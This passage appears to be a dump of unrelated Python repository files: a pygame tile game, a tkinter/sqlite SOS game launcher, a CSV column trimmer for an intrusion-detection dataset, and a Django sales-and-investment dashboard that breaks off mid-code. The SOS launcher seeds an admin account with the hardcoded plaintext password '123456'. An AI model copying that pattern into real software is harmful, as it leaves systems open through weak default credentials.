self.player_movement = Vector2(0, 0)
def start(self) -> None:
self.initialize()
self.running = True
t0 = pygame.time.get_ticks()
while self.running:
self.handle_events()
t1 = pygame.time.get_ticks()
self.update((t1 - t0) / 1000)
self.render()
t0 = t1
def initialize(self) -> None:
pygame.init()
self.screen = pygame.display.set_mode(SCREEN_SIZE)
def handle_events(self) -> None:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.running = False
elif event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:
sgn = 1 if event.type == pygame.KEYDOWN else -1
                change = Vector2(0, 0)
if pygame.K_UP == event.key:
change.y = -sgn
elif pygame.K_DOWN == event.key:
change.y = sgn
elif pygame.K_LEFT == event.key:
change.x = -sgn
elif pygame.K_RIGHT == event.key:
change.x = sgn
elif pygame.K_SPACE == event.key and event.type == pygame.KEYUP:
sprite = pygame.sprite.spritecollideany(self.player, self.level.interactions, False)
if sprite is None:
return
interacted = sprite.map_object
self.level.activate_object(interacted)
self.player_movement += change
self.player.move(self.player_movement)
def update(self, time_delta: float) -> None:
self.player.update(time_delta)
def render_tiles_layer(self, layer: TiledTileLayer, offset: Vector2) -> None:
for x, y, image in layer.tiles():
pos_x = offset[0] + x * self.level.tile_size
pos_y = offset[1] + y * self.level.tile_size
self.screen.blit(image, (pos_x, pos_y))
    def render_objects_layer(self, layer: TiledTileLayer, offset: Vector2) -> None:
        for obj in layer:
            if obj.image:
                self.screen.blit(obj.image, (obj.x + offset.x, obj.y + offset.y))
def render(self) -> None:
offset = Vector2()
offset.x = (SCREEN_SIZE[0] - self.level.map_data.width * self.level.tile_size) // 2
offset.y = (SCREEN_SIZE[1] - self.level.map_data.height * self.level.tile_size) // 2
self.screen.fill((0, 0, 0))
for layer in self.level.map_data.visible_tile_layers:
self.render_tiles_layer(self.level.map_data.layers[layer], offset)
for layer in self.level.map_data.visible_object_groups:
self.render_objects_layer(self.level.map_data.layers[layer], offset)
self.screen.blit(self.player.image, self.player.rect.move(offset.x, offset.y))
pygame.display.flip()
class Level:
def __init__(self, name: str, game: Game):
self.map_data = pytmx.load_pygame("%s/%s.tmx" % (ASSETS_DIR, name))
self.colliders = pygame.sprite.Group()
self.interactions = pygame.sprite.Group()
self.triggers = pygame.sprite.Group()
self.game = game
self.player = None
self.tile_size = self.map_data.tilewidth
self.bounds = pygame.Rect(0, 0, self.tile_size * self.map_data.width, self.tile_size * self.map_data.height)
self.name = name
assert self.map_data.tilewidth == self.map_data.tileheight
for group in self.map_data.objectgroups:
if group.name == "Collision":
for obj in group:
self.colliders.add(MapObject(obj))
if group.name == "Interaction":
for obj in group:
self.interactions.add(MapObject(obj))
if group.name == "Trigger":
for obj in group:
self.triggers.add(MapObject(obj))
def set_player(self, player: "Player", on_spawn : bool) -> None:
self.player = player
player.level = self
if not on_spawn:
return
try:
spawn = self.map_data.get_object_by_name("Spawn")
player.position = Vector2(spawn.x, spawn.y)
except ValueError:
pass
def activate_object(self, obj : TiledObject) -> None:
print(obj)
class MapObject(pygame.sprite.Sprite):
def __init__(self, obj_data):
super().__init__()
self.rect = (obj_data.x, obj_data.y, obj_data.width, obj_data.height)
self.map_object = obj_data
class Player(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.level = None
self.image = pygame.image.load("%s/Player.png" % ASSETS_DIR)
self.rect = pygame.Rect(0, 0, self.image.get_width(), self.image.get_height())
self._position = Vector2(0, 0)
self._speed = Vector2(0, 0)
self.velocity = 2
self._triggered = set()
def move(self, direction: Vector2):
try:
self._speed = direction.normalize() * self.velocity * self.level.tile_size
except ValueError:
self._speed = Vector2(0, 0)
@property
def position(self) -> Vector2:
return self._position
@position.setter
def position(self, value: Vector2) -> None:
self._position = value
self.rect = pygame.Rect(value.x, value.y, self.rect.width, self.rect.height)
def update(self, time_delta: float):
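        # Trial move: tentatively advance the rect and commit the move only
        # if it stays inside the level bounds and hits no collider; otherwise
        # revert to the previous rect. Interaction objects newly entered this
        # frame are activated once, tracked via the _triggered set.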
if self._speed.length() == 0:
return
before = self.rect
mov = self._speed * time_delta
self.rect = pygame.Rect(self.position.x + mov.x, self.position.y + mov.y, before.width, before.height)
if spritecollideany(self, self.level.colliders, False) is None and self.level.bounds.contains(self.rect):
self._position += mov
s = set()
for obj in pygame.sprite.spritecollide(self, self.level.interactions, False):
s.add(obj.map_object)
for obj in s:
if obj not in self._triggered:
self.level.activate_object(obj)
self._triggered = s
else:
self.rect = before
|
[
"wm382710@students.mimuw.edu.pl"
] |
wm382710@students.mimuw.edu.pl
|
cc556a21ebb4a3a1da3604521e71f01202a5fcc2
|
87915f5d46d1b776b824bfb4d4e4382e02cf3835
|
/Kiasati_final/runner.py
|
333c686367ed1c2db81db0e5776ee4c40d5d438b
|
[] |
no_license
|
hamrazkiasati/sosgame
|
e70f888ac2a30956c817de0cabbc69c7d357ab15
|
d9b3195160978385fdb8f543816885c724020dd5
|
refs/heads/master
| 2022-12-03T04:12:18.066844
| 2020-08-07T19:18:31
| 2020-08-07T19:18:31
| 285,903,772
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 889
|
py
|
import sqlite3
from base import win
from tkinter import ttk
from login import opensignin, opensignup
with sqlite3.connect('users.db') as db:
cursor = db.cursor()
cursor.execute("""CREATE TABLE IF NOT EXISTS
users
(username TEXT NOT NULL PRIMARY KEY,
password TEXT NOT NULL,
first TEXT NOT NULL,
last TEXT NOT NULL,
games INTEGER,
wins INTEGER,
isAdmin Boolean
);""")
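    # Seed a default admin account on the first run so the login screen is
    # usable before any user signs up.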
cursor.execute("select * from users where username = 'admin' ")
isFirst = cursor.fetchone()
if isFirst is None:
cursor.execute("INSERT INTO users VALUES('admin','123456','Hamraaz','Kiasati','0','0',true)")
db.commit()
db.close()
btn_login = ttk.Button(win, text='Sign in', command=opensignin)
btn_login.place(relx=0.3, rely=0.3)
btn_signup = ttk.Button(win, text='Sign up', command=opensignup)
btn_signup.place(relx=0.3, rely=0.6)
win.mainloop()
|
[
"noreply@github.com"
] |
hamrazkiasati.noreply@github.com
|
447eaf5574e069bc15b07fe9d3e0afec6844b381
|
d2aa30899042e9f4755700850839dd1df38a723f
|
/cutcsv.py
|
d5e52b6210226a723feff4c3990b343b639ce131
|
[] |
no_license
|
DhvanilVadher/Intrusion-Detection-System-using-ANN.
|
40edcfd9b3fb588fdbdd40e447813cb99acc5bad
|
ab3149af97826e2e7b81cd424b4af18acfe7e5ef
|
refs/heads/main
| 2023-04-13T02:58:42.725005
| 2021-04-23T15:18:42
| 2021-04-23T15:18:42
| 345,471,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
import pandas as pd
f=pd.read_csv("./editcsv/FridayDDOS.csv")
keep_col = [' Average Packet Size','Active Mean',' Active Min',' Flow IAT Mean',' Flow Duration',' Fwd Packet Length Mean','Total Length of Fwd Packets',' Subflow Fwd Bytes',' Bwd IAT Mean',' Bwd Packet Length Std',' Bwd Packet Length Min',' Label']
new_f = f[keep_col]
new_f.to_csv("FridayCUT.csv", index=False)
|
[
""
] | |
d193039a18ab69a521087eba5cafe9748b85bddd
|
8543d0f9dc3afe9b1f94701905168afd0f683da2
|
/Django/Latest_MMM/Web/views.py
|
7ca2c0416af53e10cdfa63e01c4989db95774e21
|
[] |
no_license
|
kasunsampathhewage/test_v1
|
da1b18ca27e0879411d4d81270a1034157e6d0cf
|
40a1182650eb9fd0bda6b2ad7ead047a202d3eae
|
refs/heads/master
| 2023-02-08T03:16:57.965921
| 2020-12-26T08:49:18
| 2020-12-26T08:49:18
| 323,825,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51,671
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.http import JsonResponse
import pandas as pd
import numpy as np
from datetime import datetime
from sorted_months_weekdays import *
from sort_dataframeby_monthorweek import *
from .models import *
import calendar
from .predict import *
# Create your views here.
def indexpage(request):
years = cd_year()
months = cd_month()
bigcs = cd_bigc()
#get values from filter
yearf = request.POST.get('year')
monthf = request.POST.get('month')
bigcf = request.POST.get('bigc')
# filter data frame
if request.method == "POST":
df = SummarydataframeCreation()
df1 = df[(df.bigc == bigcf)&(df.year == yearf)]
df1_1 = df[(df.bigc == bigcf)&(df.year == yearf)&(df.month == monthf)]
else:
df = SummarydataframeCreation()
df = df.sort_values(by='date')
a = df['year'].iloc[-1]
b = df['month'].iloc[-1]
df1 = df[(df.year == a)]
df1_1 = df[(df.year == a)&(df.month == b)]
# Monthly sales chart1
df2 = df1.groupby('month', as_index=False).agg({"Sales": "sum"})
df2 = Sort_Dataframeby_Month(df=df2, monthcolumnname='month')
Sale_Date = df2['month'].values.tolist()
Sale_Amount = df2['Sales'].values.tolist()
# monthly investment chart2
df4 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df4 = pd.melt(df4, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df4 = df4.groupby(['month','date'])['value'].sum().reset_index()
df4 = Sort_Dataframeby_Month(df=df4, monthcolumnname='month')
investment_month = df4['month'].values.tolist()
investment_Amount = df4['value'].values.tolist()
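    # Pattern used throughout this view: melt the per-channel spend columns
    # into (Investment_Types, value) rows, aggregate with groupby, then order
    # the calendar months with Sort_Dataframeby_Month before plotting.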
# investment for promotion type chart3
df5 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df5 = pd.melt(df5, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df5 = df5.groupby(['month', 'Investment_Types'])['value'].sum().reset_index()
df5 = Sort_Dataframeby_Month(df=df5, monthcolumnname='month')
df5_1= df5[df5['Investment_Types'] == 'AandP']
investment_Amount_A_P = df5_1['value'].values.tolist()
investment_month_A_P = df5_1['month'].values.tolist()
df5_2 = df5[df5['Investment_Types'] == 'Consumer_Promotion']
investment_Amount_Consumer_Promotion = df5_2['value'].values.tolist()
df5_3 = df5[df5['Investment_Types'] == 'Display_Only']
investment_Amount_Display_Only = df5_3['value'].values.tolist()
df5_4 = df5[df5['Investment_Types'] == 'Distributor_Margins']
investment_Amount_Distributor_Margins = df5_4['value'].values.tolist()
df5_5 = df5[df5['Investment_Types'] == 'JBP']
investment_Amount_JBP = df5_5['value'].values.tolist()
df5_6 = df5[df5['Investment_Types'] == 'Loyalty_Schemes']
investment_Amount_Loyalty_Schemes = df5_6['value'].values.tolist()
df5_7 = df5[df5['Investment_Types'] == 'Search_Only']
investment_Amount_Search_Only = df5_7['value'].values.tolist()
df5_8 = df5[df5['Investment_Types'] == 'Trade_Promotion']
investment_Amount_Trade_Promotion = df5_8['value'].values.tolist()
df5_9 = df5[df5['Investment_Types'] == 'Video']
investment_Amount_Video = df5_9['value'].values.tolist()
df5_10 = df5[df5['Investment_Types'] == 'facebook']
investment_Amount_facebook = df5_10['value'].values.tolist()
df5_11 = df5[df5['Investment_Types'] == 'instagram']
investment_Amount_instagram = df5_11['value'].values.tolist()
df5_12 = df5[df5['Investment_Types'] == 'messenger']
investment_Amount_messenger = df5_12['value'].values.tolist()
# Total investment for thr year chart4
if request.method == "POST":
df7 = df1.groupby(['date','month','bigc'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8 = df7[['month', 'date','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8 = pd.melt(df8, id_vars=['date', 'month','Sales','bigc'], var_name='Investment_Types', value_name='value')
df8 = df8.groupby(['date','month','bigc','Sales'])['value'].sum().reset_index()
df8['ROI'] = df8['Sales']/(df8['value'])
ROI_value = df8['ROI'].values.tolist()
ROI_month = df8['month'].values.tolist()
else:
df7 = df1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8 = df7[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8 = pd.melt(df8, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8 = df8.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8['ROI'] = df8['Sales']/(df8['value'])
ROI_value = df8['ROI'].values.tolist()
ROI_month = df8['month'].values.tolist()
# ROI for promotion types chart5
if request.method == "POST":
df13 = df1_1.groupby(['year','month','bigc'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'year','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['year', 'month','Sales','bigc'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
else:
df13 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
# get values for cart1 (Total sales)
total_sales_cart = df1_1['Sales'].sum()/1000000
total_sales_cart = round(total_sales_cart, 2)
# get values for cart2 (Total investments)
df3_1 = df1_1[['date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins', 'Loyalty_Schemes',
'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df3_1 = pd.melt(df3_1, id_vars=['date'], var_name='Investment_Types', value_name='value')
df3_1 = df3_1.groupby(['date'])['value'].sum().reset_index()
df3_1['Date'] = pd.to_datetime(df3_1['date'])
investment_Amount_cart = df3_1['value'].sum()/1000000
investment_Amount_cart=round(investment_Amount_cart, 2)
#get values for cart3 (Sales/investments)
if request.method == "POST":
df7_1 = df1_1.groupby(['date','month','bigc'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8_1 = df7_1[['month', 'date','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8_1 = pd.melt(df8_1, id_vars=['date', 'month','Sales','bigc'], var_name='Investment_Types', value_name='value')
df8_1 = df8_1.groupby(['date','month','bigc','Sales'])['value'].sum().reset_index()
df8_1['ROI'] = df8_1['Sales']/(df8_1['value'])
ROI_value_cart = round(df8_1['ROI'].sum(),4)
else:
df7_1 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8_1 = df7_1[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8_1 = pd.melt(df8_1, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8_1 = df8_1.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8_1['ROI'] = df8_1['Sales']/(df8_1['value'])
ROI_value_cart = round(df8_1['ROI'].sum(),4)
#pass variables to html pages
context = {'yearf':yearf,'monthf':monthf,'bigcf':bigcf,'total_sales_cart': total_sales_cart, 'investment_Amount_cart':investment_Amount_cart
,'Sale_Date': Sale_Date, 'Sale_Amount': Sale_Amount,'years':years,'months':months,'bigcs':bigcs
,'investment_Amount':investment_Amount,'investment_month':investment_month
,'investment_Amount_A_P':investment_Amount_A_P,'investment_month_A_P':investment_month_A_P
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'investment_Amount_Display_Only':investment_Amount_Display_Only
,'investment_Amount_Distributor_Margins':investment_Amount_Distributor_Margins
,'investment_Amount_JBP':investment_Amount_JBP
,'investment_Amount_Loyalty_Schemes':investment_Amount_Loyalty_Schemes
,'investment_Amount_Search_Only':investment_Amount_Search_Only
,'investment_Amount_Trade_Promotion':investment_Amount_Trade_Promotion
,'investment_Amount_Video':investment_Amount_Video
,'investment_Amount_facebook':investment_Amount_facebook
,'investment_Amount_instagram':investment_Amount_instagram
,'investment_Amount_messenger':investment_Amount_messenger
,'investment_Amount_Consumer_Promotion':investment_Amount_Consumer_Promotion
,'ROI_value':ROI_value,'ROI_month':ROI_month,'ROI_value_cart':ROI_value_cart
,'ROI_Investment_value':ROI_Investment_value,'ROI_Investment_Types':ROI_Investment_Types
}
#get values for cart4 (Sales growth)
#get previous month
if request.method == "POST":
current_month = list(calendar.month_abbr).index(monthf)
previous_month = current_month-1
previous_month_abb = calendar.month_abbr[previous_month]
current_year = yearf
if previous_month == 0:
previous_month = 12
previous_month_abb = calendar.month_abbr[previous_month]
current_year = int(yearf)-1
current_year = str(current_year)
df_total_sales_for_previous_month = df[(df.bigc == bigcf)&(df.year == current_year)&(df.month == previous_month_abb)]
previous_total_sales = df_total_sales_for_previous_month['Sales'].sum()/1000000
sales_growth_cart = (total_sales_cart - previous_total_sales)/previous_total_sales*100
sales_growth_cart = round(sales_growth_cart, 2)
context.update({'sales_growth_cart': sales_growth_cart,'previous_month_abb':previous_month_abb })
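        # Month-wrap note (illustrative): list(calendar.month_abbr) is
        # ['', 'Jan', ..., 'Dec'], so for January the index arithmetic above
        # yields 0 (the empty padding entry); the branch resets it to 12 and
        # steps the year back to get December of the previous year.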
else:
pass
return render(request, 'home.html', context)
def brand(request):
years = cd_year()
months = cd_month()
bigcs = cd_bigc()
Fbrands = cd_FoodBrands()
Bbrands = cd_BeveragesBrands()
HCbrands = cd_HomeProductsBrands()
SCbrands = cd_SelfCareBrands()
#get values from filter
yearf = request.POST.get('year')
monthf = request.POST.get('month')
bigcf = request.POST.get('bigc')
branf = request.POST.get('brand')
# filter data frame
if request.method == "POST":
df = SummarydataframeCreation()
df1 = df[(df.bigc == bigcf)&(df.Brand_name == branf)&(df.year == yearf)]
df1_1 = df[(df.bigc == bigcf)&(df.Brand_name == branf)&(df.year == yearf)&(df.month == monthf)]
else:
df = SummarydataframeCreation()
df = df.sort_values(by='date')
a = df['year'].iloc[-1]
b = df['month'].iloc[-1]
df1 = df[(df.year == a)]
df1_1 = df[(df.year == a)&(df.month == b)]
# Monthly sales chart1
df2 = df1.groupby('month', as_index=False).agg({"Sales": "sum"})
df2 = Sort_Dataframeby_Month(df=df2, monthcolumnname='month')
Sale_Date = df2['month'].values.tolist()
Sale_Amount = df2['Sales'].values.tolist()
# monthly investment chart2
df4 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df4 = pd.melt(df4, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df4 = df4.groupby(['month','date'])['value'].sum().reset_index()
df4 = Sort_Dataframeby_Month(df=df4, monthcolumnname='month')
investment_month = df4['month'].values.tolist()
investment_Amount = df4['value'].values.tolist()
# investment for promotion type chart3
df5 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df5 = pd.melt(df5, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df5 = df5.groupby(['month', 'Investment_Types'])['value'].sum().reset_index()
df5 = Sort_Dataframeby_Month(df=df5, monthcolumnname='month')
df5_1= df5[df5['Investment_Types'] == 'AandP']
investment_Amount_A_P = df5_1['value'].values.tolist()
investment_month_A_P = df5_1['month'].values.tolist()
df5_2 = df5[df5['Investment_Types'] == 'Consumer_Promotion']
investment_Amount_Consumer_Promotion = df5_2['value'].values.tolist()
df5_3 = df5[df5['Investment_Types'] == 'Display_Only']
investment_Amount_Display_Only = df5_3['value'].values.tolist()
df5_4 = df5[df5['Investment_Types'] == 'Distributor_Margins']
investment_Amount_Distributor_Margins = df5_4['value'].values.tolist()
df5_5 = df5[df5['Investment_Types'] == 'JBP']
investment_Amount_JBP = df5_5['value'].values.tolist()
df5_6 = df5[df5['Investment_Types'] == 'Loyalty_Schemes']
investment_Amount_Loyalty_Schemes = df5_6['value'].values.tolist()
df5_7 = df5[df5['Investment_Types'] == 'Search_Only']
investment_Amount_Search_Only = df5_7['value'].values.tolist()
df5_8 = df5[df5['Investment_Types'] == 'Trade_Promotion']
investment_Amount_Trade_Promotion = df5_8['value'].values.tolist()
df5_9 = df5[df5['Investment_Types'] == 'Video']
investment_Amount_Video = df5_9['value'].values.tolist()
df5_10 = df5[df5['Investment_Types'] == 'facebook']
investment_Amount_facebook = df5_10['value'].values.tolist()
df5_11 = df5[df5['Investment_Types'] == 'instagram']
investment_Amount_instagram = df5_11['value'].values.tolist()
df5_12 = df5[df5['Investment_Types'] == 'messenger']
investment_Amount_messenger = df5_12['value'].values.tolist()
# Total sales/ total investments chart 4
if request.method == "POST":
df6 = df1[['month', 'date','bigc','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df6 = pd.melt(df6, id_vars=['date', 'month','bigc','Sales'], var_name='Investment_Types', value_name='value')
df6 = df6.groupby(['date','month','bigc','Sales'])['value'].sum().reset_index()
df6['ROI'] = df6['Sales']/(df6['value'])
ROI_value = df6['ROI'].values.tolist()
ROI_month = df6['month'].values.tolist()
else:
df7 = df1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8 = df7[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df8 = pd.melt(df8, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df8 = df8.groupby(['date','month','Sales'])['value'].sum().reset_index()
df8['ROI'] = df8['Sales']/(df8['value'])
ROI_value = df8['ROI'].values.tolist()
ROI_month = df8['month'].values.tolist()
# ROI for promotion types chart5
if request.method == "POST":
df13 = df1_1.groupby(['year','month','Brand_name'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'year','Brand_name','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['year', 'month','Sales','Brand_name'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
else:
df13 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df13 = df13[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df13 = pd.melt(df13, id_vars=['date', 'month','Sales'], var_name='Investment_Types', value_name='value')
df13=df13[df13!=0].dropna()
df13['ROI'] = df13['Sales']/(df13['value'])
ROI_Investment_value = df13['ROI'].values.tolist()
ROI_Investment_Types = df13['Investment_Types'].values.tolist()
# ROI with contribution
# NoMonths=3
# bigcf ='Foods'
# brandf ='Brd00001'
# dfprep=DataPreprocessing(bigcf,brandf)
# df2,seconddiff,finaldf=test2(dfprep)
# results=VARmodel(df2)
# dfe_forecast=forecastData(results,df2,NoMonths,dfprep)
# invertsale1=invert_transformation(dfprep,df2,second_diff=seconddiff)
# invertsale1=np.exp(invertsale1)
# invertSale=invert_transformation(dfprep,dfe_forecast,second_diff=seconddiff)
# invertSale=np.exp(invertSale)
# #invert sale has only forecast data
# #finaldf has the actual data
# #appending the both dataframes togather to chart 1
# #takes only last 12 rows for the plot as in line 146
# fulldfForecast1=finaldf.append(invertSale)
# #keeping a copy for later purpose
# fulldfForecast1_2=fulldfForecast1.copy()
# fulldfForecast1['date'] = fulldfForecast1.index
# fulldfForecast1['date']=fulldfForecast1['date'].dt.strftime('%Y/%b/%d')
# fulldfForecast1['Sales2']=fulldfForecast1['Sales']
# fulldfForecast1=fulldfForecast1.tail(12)
# A=fulldfForecast1.iloc[:-NoMonths]
# A['Date']=A.index
# A['Date']=A['Date'].dt.strftime('%Y/%b/%d')
# B=fulldfForecast1.tail(NoMonths)
# B['Date']=B.index
# B['Date']=B['Date'].dt.strftime('%Y/%b/%d')
# Sale_Date = fulldfForecast1['date'].values.tolist()
# Sale_Amount =fulldfForecast1['Sales'].values.tolist()
# Sale_AmountP =fulldfForecast1['Sales2'].values.tolist()
# Sale_Amount1 =A['Sales'].values.tolist()
# Sale_Amount2 =B['Sales'].values.tolist()
# Sale_Date1 = A['Date'].values.tolist()
# Sale_Date2 = B['Date'].values.tolist()
# #contribution chart
# x=fulldfForecast1_2.shape[0]
# elasticity=impulseResponse(results,x,fulldfForecast1_2)
# contribution=Contribution(elasticity,fulldfForecast1_2)
# contribution2=contribution.copy()
# df_tt=ROI(contribution2,elasticity,3,2019,"Jan")
# Investment_type=df_tt['Investment Type'].values.tolist()
# ROI1=df_tt['ROI'].values.tolist()
# get values for cart1 (total sales)
total_sales_cart = df1_1['Sales'].sum()/1000000
total_sales_cart = round(total_sales_cart, 2)
# get values for cart2 (total investment)
df3_1 = df1_1[['date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins', 'Loyalty_Schemes',
'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df3_1 = pd.melt(df3_1, id_vars=['date'], var_name='Investment_Types', value_name='value')
df3_1 = df3_1.groupby(['date'])['value'].sum().reset_index()
df3_1['Date'] = pd.to_datetime(df3_1['date'])
investment_Amount_cart = df3_1['value'].sum()/1000000
investment_Amount_cart=round(investment_Amount_cart, 2)
#get values for cart3 (total sales/ total investments)
if request.method == "POST":
df6_1 = df1_1[['month', 'date','bigc','Brand_name','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df6_1 = pd.melt(df6_1, id_vars=['date', 'month','bigc','Brand_name','Sales'], var_name='Investment_Types', value_name='value')
df6_1 = df6_1.groupby(['date','month','bigc','Brand_name','Sales'])['value'].sum().reset_index()
df6_1['ROI'] = df6_1['Sales']/(df6_1['value'])
ROI_value_cart = round(df6_1['ROI'].sum(),4)
else:
df6_1 = df1_1.groupby(['date','month'])['Sales','Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins','Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger'].sum().reset_index()
df8_1 = df6_1[['month', 'date','Sales', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
